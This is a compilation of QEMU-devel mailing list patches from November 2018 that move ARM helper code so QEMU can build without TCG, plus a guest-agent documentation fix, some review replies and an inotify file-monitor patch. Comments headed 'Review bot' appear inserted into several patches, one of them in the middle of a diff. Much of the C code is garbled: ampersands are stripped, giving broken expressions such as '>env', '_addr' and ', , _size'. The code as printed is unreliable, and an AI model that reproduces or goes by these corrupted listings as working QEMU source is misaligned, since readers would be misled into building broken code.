-/*
- * Map a single [sub]page. Regions smaller than our declared
- * target page size are handled specially, so for those we
- * pass in the exact addresses.
- */
-if (page_size >= TARGET_PAGE_SIZE) {
-phys_addr &= TARGET_PAGE_MASK;
-address &= TARGET_PAGE_MASK;
-}
-tlb_set_page_with_attrs(cs, address, phys_addr, attrs,
-prot, mmu_idx, page_size);
-return 0;
-}
-
-return ret;
-}
-
 hwaddr arm_cpu_get_phys_page_attrs_debug(CPUState *cs, vaddr addr,
  MemTxAttrs *attrs)
 {
diff --git a/target/arm/op_helper.c b/target/arm/op_helper.c
index 44a74cb296..3b0459db50 100644
--- a/target/arm/op_helper.c
+++ b/target/arm/op_helper.c
@@ -179,6 +179,44 @@ static void deliver_fault(ARMCPU *cpu, vaddr addr, 
MMUAccessType access_type,
 raise_exception(env, exc, syn, target_el);
 }
 
+/* Walk the page table and (if the mapping exists) add the page
+ * to the TLB. Return false on success, or true on failure. Populate
+ * fsr with ARM DFSR/IFSR fault register format value on failure.
+ */
+static bool arm_tlb_fill(CPUState *cs, vaddr address,
+ MMUAccessType access_type, int mmu_idx,
+ ARMMMUFaultInfo *fi)
+{
+ARMCPU *cpu = ARM_CPU(cs);
+CPUARMState *env = >env;
+hwaddr phys_addr;
+target_ulong page_size;
+int prot;
+int ret;
+MemTxAttrs attrs = {};
+
+ret = get_phys_addr(env, address, access_type,
+core_to_arm_mmu_idx(env, mmu_idx), _addr,
+, , _size, fi, NULL);
+if (!ret) {
+/*
+ * Map a single [sub]page. Regions smaller than our declared
+ * target page size are handled specially, so for those we
+ * pass in the exact addresses.
+ */
+if (page_size >= TARGET_PAGE_SIZE) {
+phys_addr &= TARGET_PAGE_MASK;
+address &= TARGET_PAGE_MASK;
+}
+tlb_set_page_with_attrs(cs, address, phys_addr, attrs,
+prot, mmu_idx, page_size);
+return 0;
+}
+
+return ret;
+}
+
+
 /* try to fill the TLB and return an exception if error. If retaddr is
  * NULL, it means that the function was called in C code (i.e. not
  * from generated code or from helper.c)
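Review bot: The moved arm_tlb_fill() still carries the stale comment "Populate fsr with ARM DFSR/IFSR fault register format value on failure", but the function has no fsr parameter; it receives an `ARMMMUFaultInfo *fi`, so while the function is being touched the comment should say `* fi with the fault details on failure.` The function is declared bool yet ends with `return 0;` and `return ret;` from an `int ret`; `return false;` and `return ret != 0;` (or making `ret` a bool) would match the declared return type. There is also a doubled blank line after the closing brace before the next comment block.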
-- 
2.19.1




[Qemu-devel] [PATCH 11/13] target: arm: Define TCG dependent functions when TCG is enabled

2018-11-13 Thread Samuel Ortiz
do_interrupt, do_unaligned_access, do_transaction_failed and debug_excp
are only relevant in the TCG context, so we should not define them
when TCG is disabled.

Signed-off-by: Samuel Ortiz 
Reviewed-by: Philippe Mathieu-Daudé 
Tested-by: Philippe Mathieu-Daudé 
Reviewed-by: Robert Bradford 
---
 target/arm/cpu.c | 8 ++--
 1 file changed, 6 insertions(+), 2 deletions(-)

diff --git a/target/arm/cpu.c b/target/arm/cpu.c
index 60411f6bfe..fb2e5d430e 100644
--- a/target/arm/cpu.c
+++ b/target/arm/cpu.c
@@ -1444,7 +1444,7 @@ static void arm_v7m_class_init(ObjectClass *oc, void 
*data)
 {
 CPUClass *cc = CPU_CLASS(oc);
 
-#ifndef CONFIG_USER_ONLY
+#if !defined(CONFIG_USER_ONLY) && defined(CONFIG_TCG)
 cc->do_interrupt = arm_v7m_cpu_do_interrupt;
 #endif
 
@@ -2061,9 +2061,14 @@ static void arm_cpu_class_init(ObjectClass *oc, void 
*data)
 #ifdef CONFIG_USER_ONLY
 cc->handle_mmu_fault = arm_cpu_handle_mmu_fault;
 #else
+
+#ifdef CONFIG_TCG
 cc->do_interrupt = arm_cpu_do_interrupt;
 cc->do_unaligned_access = arm_cpu_do_unaligned_access;
 cc->do_transaction_failed = arm_cpu_do_transaction_failed;
+cc->debug_excp_handler = arm_debug_excp_handler;
+#endif
+
 cc->get_phys_page_attrs_debug = arm_cpu_get_phys_page_attrs_debug;
 cc->asidx_from_attrs = arm_asidx_from_attrs;
 cc->vmsd = _arm_cpu;
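Review bot: Moving `cc->debug_excp_handler = arm_debug_excp_handler;` into the `#ifdef CONFIG_TCG` block that sits inside the `#else` of `#ifdef CONFIG_USER_ONLY` also drops the assignment from user-mode builds, where the removed line in the third hunk was unconditional; the commit message only motivates the TCG gating. If user-mode debug exceptions still rely on the handler, it should be set under `#ifdef CONFIG_TCG` outside the CONFIG_USER_ONLY split, for instance next to the gdb hooks in the third hunk. arm_cpu_class_init starts and ends outside this hunk.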
@@ -2076,7 +2081,6 @@ static void arm_cpu_class_init(ObjectClass *oc, void 
*data)
 cc->gdb_arch_name = arm_gdb_arch_name;
 cc->gdb_get_dynamic_xml = arm_gdb_get_dynamic_xml;
 cc->gdb_stop_before_watchpoint = true;
-cc->debug_excp_handler = arm_debug_excp_handler;
 cc->debug_check_watchpoint = arm_debug_check_watchpoint;
 #if !defined(CONFIG_USER_ONLY)
 cc->adjust_watchpoint_address = arm_adjust_watchpoint_address;
-- 
2.19.1




[Qemu-devel] [PATCH 02/13] target: arm: Remove unused headers

2018-11-13 Thread Samuel Ortiz
From: Philippe Mathieu-Daudé 

Signed-off-by: Philippe Mathieu-Daudé 
Reviewed-by: Robert Bradford 
Reviewed-by: Samuel Ortiz 
---
 target/arm/helper.c | 3 ---
 1 file changed, 3 deletions(-)

diff --git a/target/arm/helper.c b/target/arm/helper.c
index 3d4e9c5c8a..27d9285e1e 100644
--- a/target/arm/helper.c
+++ b/target/arm/helper.c
@@ -12,13 +12,10 @@
 #include "internals.h"
 #include "exec/gdbstub.h"
 #include "exec/helper-proto.h"
-#include "qemu/host-utils.h"
 #include "sysemu/arch_init.h"
 #include "sysemu/sysemu.h"
-#include "qemu/bitops.h"
 #include "qemu/crc32c.h"
 #include "exec/exec-all.h"
-#include "exec/cpu_ldst.h"
 #include "arm_ldst.h"
 #include  /* For crc32 */
 #include "exec/semihost.h"
-- 
2.19.1




[Qemu-devel] [PATCH v2 1/1] qga: update docs with systemd suspend support info

2018-11-13 Thread Daniel Henrique Barboza
Commit 067927d62e ("qga: systemd hibernate/suspend/hybrid-sleep
support") failed to update qapi-schema.json after adding systemd
hibernate/suspend/hybrid-sleep capabilities to guest-suspend-* QGA
commands.

Signed-off-by: Daniel Henrique Barboza 
---
 qga/qapi-schema.json | 25 ++---
 1 file changed, 14 insertions(+), 11 deletions(-)

diff --git a/qga/qapi-schema.json b/qga/qapi-schema.json
index c6725b3ec8..61f66fc461 100644
--- a/qga/qapi-schema.json
+++ b/qga/qapi-schema.json
@@ -532,12 +532,12 @@
 #
 # Suspend guest to disk.
 #
-# This command tries to execute the scripts provided by the pm-utils package.
-# If it's not available, the suspend operation will be performed by manually
-# writing to a sysfs file.
+# This command attempts to suspend the guest using three strategies, in this
+# order:
 #
-# For the best results it's strongly recommended to have the pm-utils
-# package installed in the guest.
+# - systemd hibernate
+# - pm-utils (via pm-hibernate)
+# - manual write into sysfs
 #
 # This command does NOT return a response on success. There is a high chance
 # the command succeeded if the VM exits with a zero exit status or, when
@@ -560,12 +560,12 @@
 #
 # Suspend guest to ram.
 #
-# This command tries to execute the scripts provided by the pm-utils package.
-# If it's not available, the suspend operation will be performed by manually
-# writing to a sysfs file.
+# This command attempts to suspend the guest using three strategies, in this
+# order:
 #
-# For the best results it's strongly recommended to have the pm-utils
-# package installed in the guest.
+# - systemd suspend
+# - pm-utils (via pm-suspend)
+# - manual write into sysfs
 #
 # IMPORTANT: guest-suspend-ram requires QEMU to support the 'system_wakeup'
 # command.  Thus, it's *required* to query QEMU for the presence of the
@@ -592,7 +592,10 @@
 #
 # Save guest state to disk and suspend to ram.
 #
-# This command requires the pm-utils package to be installed in the guest.
+# This command attempts to suspend the guest by executing, in this order:
+#
+# - systemd hybrid-sleep
+# - pm-utils (via pm-suspend-hybrid)
 #
 # IMPORTANT: guest-suspend-hybrid requires QEMU to support the 'system_wakeup'
 # command.  Thus, it's *required* to query QEMU for the presence of the
-- 
2.19.1




[Qemu-devel] [PATCH 01/13] target: arm: Add copyright boilerplate

2018-11-13 Thread Samuel Ortiz
From: Philippe Mathieu-Daudé 

Signed-off-by: Philippe Mathieu-Daudé 
Reviewed-by: Robert Bradford 
Reviewed-by: Samuel Ortiz 
---
 target/arm/helper.c | 7 +++
 1 file changed, 7 insertions(+)

diff --git a/target/arm/helper.c b/target/arm/helper.c
index 0da1424f72..3d4e9c5c8a 100644
--- a/target/arm/helper.c
+++ b/target/arm/helper.c
@@ -1,3 +1,10 @@
+/*
+ * ARM generic helpers.
+ *
+ * This code is licensed under the GNU GPL v2.
+ *
+ * SPDX-License-Identifier: GPL-2.0-or-later
+ */
 #include "qemu/osdep.h"
 #include "target/arm/idau.h"
 #include "trace.h"
-- 
2.19.1




[Qemu-devel] [PATCH 08/13] target: arm: Move all VFP helpers into their own file

2018-11-13 Thread Samuel Ortiz
Since softfloat is only relevant with TCG, we move all ARM VFP helpers
into their own file (vfp_helper.c), in order to support TCG disablement
on ARM.

Signed-off-by: Samuel Ortiz 
Signed-off-by: Philippe Mathieu-Daudé 
Reviewed-by: Philippe Mathieu-Daudé 
Tested-by: Philippe Mathieu-Daudé 
Reviewed-by: Robert Bradford 
---
 target/arm/helper.c  | 871 --
 target/arm/vfp_helper.c  | 893 +++
 target/arm/Makefile.objs |   2 +-
 3 files changed, 894 insertions(+), 872 deletions(-)
 create mode 100644 target/arm/vfp_helper.c

diff --git a/target/arm/helper.c b/target/arm/helper.c
index dcb689bfbb..996dfbbda2 100644
--- a/target/arm/helper.c
+++ b/target/arm/helper.c
@@ -9257,877 +9257,6 @@ void vfp_set_fpscr(CPUARMState *env, uint32_t val)
 HELPER(vfp_set_fpscr)(env, val);
 }
 
-#define VFP_HELPER(name, p) HELPER(glue(glue(vfp_,name),p))
-
-#define VFP_BINOP(name) \
-float32 VFP_HELPER(name, s)(float32 a, float32 b, void *fpstp) \
-{ \
-float_status *fpst = fpstp; \
-return float32_ ## name(a, b, fpst); \
-} \
-float64 VFP_HELPER(name, d)(float64 a, float64 b, void *fpstp) \
-{ \
-float_status *fpst = fpstp; \
-return float64_ ## name(a, b, fpst); \
-}
-VFP_BINOP(add)
-VFP_BINOP(sub)
-VFP_BINOP(mul)
-VFP_BINOP(div)
-VFP_BINOP(min)
-VFP_BINOP(max)
-VFP_BINOP(minnum)
-VFP_BINOP(maxnum)
-#undef VFP_BINOP
-
-float32 VFP_HELPER(neg, s)(float32 a)
-{
-return float32_chs(a);
-}
-
-float64 VFP_HELPER(neg, d)(float64 a)
-{
-return float64_chs(a);
-}
-
-float32 VFP_HELPER(abs, s)(float32 a)
-{
-return float32_abs(a);
-}
-
-float64 VFP_HELPER(abs, d)(float64 a)
-{
-return float64_abs(a);
-}
-
-float32 VFP_HELPER(sqrt, s)(float32 a, CPUARMState *env)
-{
-return float32_sqrt(a, >vfp.fp_status);
-}
-
-float64 VFP_HELPER(sqrt, d)(float64 a, CPUARMState *env)
-{
-return float64_sqrt(a, >vfp.fp_status);
-}
-
-/* XXX: check quiet/signaling case */
-#define DO_VFP_cmp(p, type) \
-void VFP_HELPER(cmp, p)(type a, type b, CPUARMState *env)  \
-{ \
-uint32_t flags; \
-switch(type ## _compare_quiet(a, b, >vfp.fp_status)) { \
-case 0: flags = 0x6; break; \
-case -1: flags = 0x8; break; \
-case 1: flags = 0x2; break; \
-default: case 2: flags = 0x3; break; \
-} \
-env->vfp.xregs[ARM_VFP_FPSCR] = (flags << 28) \
-| (env->vfp.xregs[ARM_VFP_FPSCR] & 0x0fff); \
-} \
-void VFP_HELPER(cmpe, p)(type a, type b, CPUARMState *env) \
-{ \
-uint32_t flags; \
-switch(type ## _compare(a, b, >vfp.fp_status)) { \
-case 0: flags = 0x6; break; \
-case -1: flags = 0x8; break; \
-case 1: flags = 0x2; break; \
-default: case 2: flags = 0x3; break; \
-} \
-env->vfp.xregs[ARM_VFP_FPSCR] = (flags << 28) \
-| (env->vfp.xregs[ARM_VFP_FPSCR] & 0x0fff); \
-}
-DO_VFP_cmp(s, float32)
-DO_VFP_cmp(d, float64)
-#undef DO_VFP_cmp
-
-/* Integer to float and float to integer conversions */
-
-#define CONV_ITOF(name, ftype, fsz, sign)   \
-ftype HELPER(name)(uint32_t x, void *fpstp) \
-{   \
-float_status *fpst = fpstp; \
-return sign##int32_to_##float##fsz((sign##int32_t)x, fpst); \
-}
-
-#define CONV_FTOI(name, ftype, fsz, sign, round)\
-sign##int32_t HELPER(name)(ftype x, void *fpstp)\
-{   \
-float_status *fpst = fpstp; \
-if (float##fsz##_is_any_nan(x)) {   \
-float_raise(float_flag_invalid, fpst);  \
-return 0;   \
-}   \
-return float##fsz##_to_##sign##int32##round(x, fpst);   \
-}
-
-#define FLOAT_CONVS(name, p, ftype, fsz, sign)\
-CONV_ITOF(vfp_##name##to##p, ftype, fsz, sign)\
-CONV_FTOI(vfp_to##name##p, ftype, fsz, sign, )\
-CONV_FTOI(vfp_to##name##z##p, ftype, fsz, sign, _round_to_zero)
-
-FLOAT_CONVS(si, h, uint32_t, 16, )
-FLOAT_CONVS(si, s, float32, 32, )
-FLOAT_CONVS(si, d, float64, 64, )
-FLOAT_CONVS(ui, h, uint32_t, 16, u)
-FLOAT_CONVS(ui, s, float32, 32, u)
-FLOAT_CONVS(ui, d, float64, 64, u)
-
-#undef CONV_ITOF
-#undef CONV_FTOI
-#undef FLOAT_CONVS
-
-/* floating point conversion */
-float64 VFP_HELPER(fcvtd, s)(float32 x, CPUARMState *env)
-{
-return float32_to_float64(x, >vfp.fp_status);
-}
-
-float32 VFP_HELPER(fcvts, d)(float64 x, CPUARMState *env)
-{
-return float64_to_float32(x, >vfp.fp_status);
-}
-
-/* VFP3 fixed point conversion.  */
-#define VFP_CONV_FIX_FLOAT(name, p, fsz, isz, itype) \
-float##fsz HELPER(vfp_##name##to##p)(uint##isz##_t  x, uint32_t shift, \
- void *fpstp) \
-{ return 

Re: [Qemu-devel] [PATCH 01/13] target: arm: Add copyright boilerplate

2018-11-13 Thread Peter Maydell
On 13 November 2018 at 16:52, Samuel Ortiz  wrote:
> From: Philippe Mathieu-Daudé 
>
> Signed-off-by: Philippe Mathieu-Daudé 
> Reviewed-by: Robert Bradford 
> Reviewed-by: Samuel Ortiz 
> ---
>  target/arm/helper.c | 7 +++
>  1 file changed, 7 insertions(+)
>
> diff --git a/target/arm/helper.c b/target/arm/helper.c
> index 0da1424f72..3d4e9c5c8a 100644
> --- a/target/arm/helper.c
> +++ b/target/arm/helper.c
> @@ -1,3 +1,10 @@
> +/*
> + * ARM generic helpers.
> + *
> + * This code is licensed under the GNU GPL v2.
> + *
> + * SPDX-License-Identifier: GPL-2.0-or-later
> + */

The human readable text says "v2", but the SPDX tag says
"v2 or later". Which is right? (The top level LICENSE file says
source files with no specific license are 2-or-later).

thanks
-- PMM



[Qemu-devel] [PATCH 10/13] target: arm: Move watchpoints APIs to helper.c

2018-11-13 Thread Samuel Ortiz
Here again, those APIs are not TCG dependent and can move to the always
built helper.c.

Signed-off-by: Samuel Ortiz 
Reviewed-by: Philippe Mathieu-Daudé 
Tested-by: Philippe Mathieu-Daudé 
Reviewed-by: Robert Bradford 
---
 target/arm/internals.h |   6 ++
 target/arm/helper.c| 204 +
 target/arm/op_helper.c | 204 -
 3 files changed, 210 insertions(+), 204 deletions(-)

diff --git a/target/arm/internals.h b/target/arm/internals.h
index ddb594d58d..7ab22208a3 100644
--- a/target/arm/internals.h
+++ b/target/arm/internals.h
@@ -937,6 +937,12 @@ bool pmsav8_mpu_lookup(CPUARMState *env, uint32_t address,
int *prot, bool *is_subpage,
ARMMMUFaultInfo *fi, uint32_t *mregion);
 
+/*
+ * Returns true when the current CPU execution context matches
+ * the watchpoint or the breakpoint pointed at by n.
+ */
+bool bp_wp_matches(ARMCPU *cpu, int n, bool is_wp);
+
 #ifdef TARGET_AARCH64
 void aarch64_cpu_dump_state(CPUState *cs, FILE *f,
 fprintf_function cpu_fprintf, int flags);
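Review bot: The comment on the newly exported bp_wp_matches() declaration does not say what `n` indexes or what `is_wp` selects, which matters now that the function is part of the shared internal API. From the definition later in this patch, `n` indexes `env->cpu_watchpoint[]` when `is_wp` is true and `env->cpu_breakpoint[]` otherwise, so adding ` * n indexes env->cpu_watchpoint[] when is_wp is true, env->cpu_breakpoint[] otherwise.` to the comment would make the contract explicit.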
diff --git a/target/arm/helper.c b/target/arm/helper.c
index ff3011fcb6..c4e7d23023 100644
--- a/target/arm/helper.c
+++ b/target/arm/helper.c
@@ -9770,3 +9770,207 @@ void arm_cpu_dump_state(CPUState *cs, FILE *f, 
fprintf_function cpu_fprintf,
 cpu_fprintf(f, "FPSCR: %08x\n", (int)env->vfp.xregs[ARM_VFP_FPSCR]);
 }
 }
+
+/* Return true if the linked breakpoint entry lbn passes its checks */
+static bool linked_bp_matches(ARMCPU *cpu, int lbn)
+{
+CPUARMState *env = >env;
+uint64_t bcr = env->cp15.dbgbcr[lbn];
+int brps = extract32(cpu->dbgdidr, 24, 4);
+int ctx_cmps = extract32(cpu->dbgdidr, 20, 4);
+int bt;
+uint32_t contextidr;
+
+/* Links to unimplemented or non-context aware breakpoints are
+ * CONSTRAINED UNPREDICTABLE: either behave as if disabled, or
+ * as if linked to an UNKNOWN context-aware breakpoint (in which
+ * case DBGWCR_EL1.LBN must indicate that breakpoint).
+ * We choose the former.
+ */
+if (lbn > brps || lbn < (brps - ctx_cmps)) {
+return false;
+}
+
+bcr = env->cp15.dbgbcr[lbn];
+
+if (extract64(bcr, 0, 1) == 0) {
+/* Linked breakpoint disabled : generate no events */
+return false;
+}
+
+bt = extract64(bcr, 20, 4);
+
+/* We match the whole register even if this is AArch32 using the
+ * short descriptor format (in which case it holds both PROCID and ASID),
+ * since we don't implement the optional v7 context ID masking.
+ */
+contextidr = extract64(env->cp15.contextidr_el[1], 0, 32);
+
+switch (bt) {
+case 3: /* linked context ID match */
+if (arm_current_el(env) > 1) {
+/* Context matches never fire in EL2 or (AArch64) EL3 */
+return false;
+}
+return (contextidr == extract64(env->cp15.dbgbvr[lbn], 0, 32));
+case 5: /* linked address mismatch (reserved in AArch64) */
+case 9: /* linked VMID match (reserved if no EL2) */
+case 11: /* linked context ID and VMID match (reserved if no EL2) */
+default:
+/* Links to Unlinked context breakpoints must generate no
+ * events; we choose to do the same for reserved values too.
+ */
+return false;
+}
+
+return false;
+}
+
+bool bp_wp_matches(ARMCPU *cpu, int n, bool is_wp)
+{
+CPUARMState *env = >env;
+uint64_t cr;
+int pac, hmc, ssc, wt, lbn;
+/* Note that for watchpoints the check is against the CPU security
+ * state, not the S/NS attribute on the offending data access.
+ */
+bool is_secure = arm_is_secure(env);
+int access_el = arm_current_el(env);
+
+if (is_wp) {
+CPUWatchpoint *wp = env->cpu_watchpoint[n];
+
+if (!wp || !(wp->flags & BP_WATCHPOINT_HIT)) {
+return false;
+}
+cr = env->cp15.dbgwcr[n];
+if (wp->hitattrs.user) {
+/* The LDRT/STRT/LDT/STT "unprivileged access" instructions should
+ * match watchpoints as if they were accesses done at EL0, even if
+ * the CPU is at EL1 or higher.
+ */
+access_el = 0;
+}
+} else {
+uint64_t pc = is_a64(env) ? env->pc : env->regs[15];
+
+if (!env->cpu_breakpoint[n] || env->cpu_breakpoint[n]->pc != pc) {
+return false;
+}
+cr = env->cp15.dbgbcr[n];
+}
+/* The WATCHPOINT_HIT flag guarantees us that the watchpoint is
+ * enabled and that the address and access type match; for breakpoints
+ * we know the address matched; check the remaining fields, including
+ * linked breakpoints. We rely on WCR and BCR having the same layout
+ * for the LBN, SSC, HMC, PAC/PMC and is-linked fields.
+ * Note that some combinations of {PAC, HMC, SSC} are reserved and
+ * must act either like some valid combination or as if the 

[Qemu-devel] [PATCH 13/13] target: arm: Do not build TCG objects when TCG is off

2018-11-13 Thread Samuel Ortiz
We can now safely turn all TCG-dependent builds off when CONFIG_TCG is
off. This allows building ARM binaries with --disable-tcg.

Signed-off-by: Samuel Ortiz 
Reviewed-by: Philippe Mathieu-Daudé 
Tested-by: Philippe Mathieu-Daudé 
Reviewed-by: Robert Bradford 
---
 target/arm/Makefile.objs | 14 --
 1 file changed, 8 insertions(+), 6 deletions(-)

diff --git a/target/arm/Makefile.objs b/target/arm/Makefile.objs
index 8e513748e3..3f59bf1685 100644
--- a/target/arm/Makefile.objs
+++ b/target/arm/Makefile.objs
@@ -1,9 +1,10 @@
 obj-y += arm-semi.o crypto_helper.o gdbstub.o helper.o cpu.o
-obj-y += translate.o op_helper.o neon_helper.o
-obj-y += iwmmxt_helper.o vec_helper.o m_helper.o
-obj-y += excp_helper.o vfp_helper.o
+obj-$(CONFIG_TCG) += translate.o op_helper.o neon_helper.o
+obj-$(CONFIG_TCG) += iwmmxt_helper.o vec_helper.o m_helper.o
+obj-$(CONFIG_TCG) += excp_helper.o vfp_helper.o
 
-obj-$(CONFIG_SOFTMMU) += machine.o psci.o arch_dump.o monitor.o arm-powerctl.o
+obj-$(CONFIG_SOFTMMU) += machine.o arch_dump.o monitor.o arm-powerctl.o
+obj-$(call land,$(CONFIG_TCG),$(CONFIG_SOFTMMU)) += psci.o
 obj-$(CONFIG_KVM) += kvm.o
 obj-$(call land,$(CONFIG_KVM),$(call lnot,$(TARGET_AARCH64))) += kvm32.o
 obj-$(call land,$(CONFIG_KVM),$(TARGET_AARCH64)) += kvm64.o
@@ -17,5 +18,6 @@ target/arm/decode-sve.inc.c: 
$(SRC_PATH)/target/arm/sve.decode $(DECODETREE)
  "GEN", $(TARGET_DIR)$@)
 
 target/arm/translate-sve.o: target/arm/decode-sve.inc.c
-obj-$(TARGET_AARCH64) += translate-sve.o sve_helper.o
-obj-$(TARGET_AARCH64) += cpu64.o translate-a64.o helper-a64.o gdbstub64.o
+obj-$(call land,$(CONFIG_TCG),$(TARGET_AARCH64)) += translate-sve.o 
sve_helper.o
+obj-$(call land,$(CONFIG_TCG),$(TARGET_AARCH64)) += translate-a64.o 
helper-a64.o
+obj-$(TARGET_AARCH64) += cpu64.o gdbstub64.o
-- 
2.19.1




Re: [Qemu-devel] [PATCH for-3.1 v2 1/1] qga: update docs with systemd suspend support info

2018-11-13 Thread Eric Blake

On 11/13/18 10:55 AM, Daniel Henrique Barboza wrote:

Commit 067927d62e ("qga: systemd hibernate/suspend/hybrid-sleep
support") failed to update qapi-schema.json after adding systemd
hibernate/suspend/hybrid-sleep capabilities to guest-suspend-* QGA
commands.

Signed-off-by: Daniel Henrique Barboza 
---
  qga/qapi-schema.json | 25 ++---
  1 file changed, 14 insertions(+), 11 deletions(-)



Reviewed-by: Eric Blake 

As a doc fix, I'm recommending the maintainer include it in 3.1.

--
Eric Blake, Principal Software Engineer
Red Hat, Inc.   +1-919-301-3266
Virtualization:  qemu.org | libvirt.org



[Qemu-devel] [PATCH 09/13] target: arm: Move CPU state dumping routines to helper.c

2018-11-13 Thread Samuel Ortiz
They're not TCG specific and should live in the generic helper file
instead.

Signed-off-by: Samuel Ortiz 
Reviewed-by: Robert Bradford 
---
 target/arm/internals.h |  12 +++
 target/arm/translate.h |   7 --
 target/arm/helper.c| 214 +
 target/arm/translate-a64.c | 125 --
 target/arm/translate.c |  87 ---
 5 files changed, 226 insertions(+), 219 deletions(-)

diff --git a/target/arm/internals.h b/target/arm/internals.h
index 06439467d2..ddb594d58d 100644
--- a/target/arm/internals.h
+++ b/target/arm/internals.h
@@ -937,4 +937,16 @@ bool pmsav8_mpu_lookup(CPUARMState *env, uint32_t address,
int *prot, bool *is_subpage,
ARMMMUFaultInfo *fi, uint32_t *mregion);
 
+#ifdef TARGET_AARCH64
+void aarch64_cpu_dump_state(CPUState *cs, FILE *f,
+fprintf_function cpu_fprintf, int flags);
+
+#else
+static inline void aarch64_cpu_dump_state(CPUState *cs, FILE *f,
+  fprintf_function cpu_fprintf,
+  int flags)
+{
+}
+#endif
+
 #endif
diff --git a/target/arm/translate.h b/target/arm/translate.h
index 1550aa8bc7..059645c23c 100644
--- a/target/arm/translate.h
+++ b/target/arm/translate.h
@@ -155,8 +155,6 @@ static inline void disas_set_insn_syndrome(DisasContext *s, 
uint32_t syn)
 #ifdef TARGET_AARCH64
 void a64_translate_init(void);
 void gen_a64_set_pc_im(uint64_t val);
-void aarch64_cpu_dump_state(CPUState *cs, FILE *f,
-fprintf_function cpu_fprintf, int flags);
 extern const TranslatorOps aarch64_translator_ops;
 #else
 static inline void a64_translate_init(void)
@@ -167,11 +165,6 @@ static inline void gen_a64_set_pc_im(uint64_t val)
 {
 }
 
-static inline void aarch64_cpu_dump_state(CPUState *cs, FILE *f,
-  fprintf_function cpu_fprintf,
-  int flags)
-{
-}
 #endif
 
 void arm_test_cc(DisasCompare *cmp, int cc);
diff --git a/target/arm/helper.c b/target/arm/helper.c
index 996dfbbda2..ff3011fcb6 100644
--- a/target/arm/helper.c
+++ b/target/arm/helper.c
@@ -9555,4 +9555,218 @@ void aarch64_sve_change_el(CPUARMState *env, int old_el,
 aarch64_sve_narrow_vq(env, new_len + 1);
 }
 }
+
+void aarch64_cpu_dump_state(CPUState *cs, FILE *f,
+fprintf_function cpu_fprintf, int flags)
+{
+ARMCPU *cpu = ARM_CPU(cs);
+CPUARMState *env = >env;
+uint32_t psr = pstate_read(env);
+int i;
+int el = arm_current_el(env);
+const char *ns_status;
+
+cpu_fprintf(f, " PC=%016" PRIx64 " ", env->pc);
+for (i = 0; i < 32; i++) {
+if (i == 31) {
+cpu_fprintf(f, " SP=%016" PRIx64 "\n", env->xregs[i]);
+} else {
+cpu_fprintf(f, "X%02d=%016" PRIx64 "%s", i, env->xregs[i],
+(i + 2) % 3 ? " " : "\n");
+}
+}
+
+if (arm_feature(env, ARM_FEATURE_EL3) && el != 3) {
+ns_status = env->cp15.scr_el3 & SCR_NS ? "NS " : "S ";
+} else {
+ns_status = "";
+}
+cpu_fprintf(f, "PSTATE=%08x %c%c%c%c %sEL%d%c",
+psr,
+psr & PSTATE_N ? 'N' : '-',
+psr & PSTATE_Z ? 'Z' : '-',
+psr & PSTATE_C ? 'C' : '-',
+psr & PSTATE_V ? 'V' : '-',
+ns_status,
+el,
+psr & PSTATE_SP ? 'h' : 't');
+
+if (!(flags & CPU_DUMP_FPU)) {
+cpu_fprintf(f, "\n");
+return;
+}
+if (fp_exception_el(env, el) != 0) {
+cpu_fprintf(f, "FPU disabled\n");
+return;
+}
+cpu_fprintf(f, " FPCR=%08x FPSR=%08x\n",
+vfp_get_fpcr(env), vfp_get_fpsr(env));
+
+if (cpu_isar_feature(aa64_sve, cpu) && sve_exception_el(env, el) == 0) {
+int j, zcr_len = sve_zcr_len_for_el(env, el);
+
+for (i = 0; i <= FFR_PRED_NUM; i++) {
+bool eol;
+if (i == FFR_PRED_NUM) {
+cpu_fprintf(f, "FFR=");
+/* It's last, so end the line.  */
+eol = true;
+} else {
+cpu_fprintf(f, "P%02d=", i);
+switch (zcr_len) {
+case 0:
+eol = i % 8 == 7;
+break;
+case 1:
+eol = i % 6 == 5;
+break;
+case 2:
+case 3:
+eol = i % 3 == 2;
+break;
+default:
+/* More than one quadword per predicate.  */
+eol = true;
+break;
+}
+}
+for (j = zcr_len / 4; j >= 0; j--) {
+int digits;
+if (j * 4 + 4 <= zcr_len + 1) {
+digits = 16;
+} else {
+ 

Re: [Qemu-devel] [PATCH v6 05/11] hw/usb: switch MTP to use new inotify APIs

2018-11-13 Thread Daniel P . Berrangé
On Wed, Nov 07, 2018 at 10:26:29PM +0400, Marc-André Lureau wrote:
> On Fri, Oct 19, 2018 at 5:42 PM Daniel P. Berrangé  
> wrote:
> >
> > The internal inotify APIs allow alot of conditional statements to be
> 
> a lot
> 
> > cleared out, and provide a simpler callback for handling events.
> >
> > Signed-off-by: Daniel P. Berrangé 
> > ---
> >  hw/usb/dev-mtp.c| 250 
> >  hw/usb/trace-events |   2 +-
> >  2 files changed, 93 insertions(+), 159 deletions(-)
> >
> > diff --git a/hw/usb/dev-mtp.c b/hw/usb/dev-mtp.c
> > index ccbe25820b..1a8d0f088d 100644
> > --- a/hw/usb/dev-mtp.c
> > +++ b/hw/usb/dev-mtp.c
> > @@ -15,13 +15,11 @@
> >  #include 
> >
> >  #include 
> > -#ifdef CONFIG_INOTIFY1
> > -#include 
> > -#include "qemu/main-loop.h"
> > -#endif
> > +
> >
> >  #include "qemu-common.h"
> >  #include "qemu/iov.h"
> > +#include "qemu/filemonitor.h"
> >  #include "trace.h"
> >  #include "hw/usb.h"
> >  #include "desc.h"
> > @@ -124,7 +122,6 @@ enum {
> >  EP_EVENT,
> >  };
> >
> > -#ifdef CONFIG_INOTIFY1
> >  typedef struct MTPMonEntry MTPMonEntry;
> >
> >  struct MTPMonEntry {
> > @@ -133,7 +130,6 @@ struct MTPMonEntry {
> >
> >  QTAILQ_ENTRY(MTPMonEntry) next;
> >  };
> > -#endif
> >
> >  struct MTPControl {
> >  uint16_t code;
> > @@ -162,10 +158,8 @@ struct MTPObject {
> >  char *name;
> >  char *path;
> >  struct stat  stat;
> > -#ifdef CONFIG_INOTIFY1
> > -/* inotify watch cookie */
> > +/* file monitor watch cookie */
> >  int  watchfd;
> 
> Why not rename it watchid to avoid confusion?

Yes, will do.

> > -static void inotify_watchfn(void *arg)
> > +static void file_monitor_event(int wd,
> > +   QFileMonitorEvent ev,
> > +   const char *name,
> > +   void *opaque)
> >  {
> > -MTPState *s = arg;
> > -ssize_t bytes;
> > -/* From the man page: atleast one event can be read */
> > -int pos;
> > -char buf[sizeof(struct inotify_event) + NAME_MAX + 1];
> > -
> > -for (;;) {
> > -bytes = read(s->inotifyfd, buf, sizeof(buf));
> > -pos = 0;
> > -
> > -if (bytes <= 0) {
> > -/* Better luck next time */
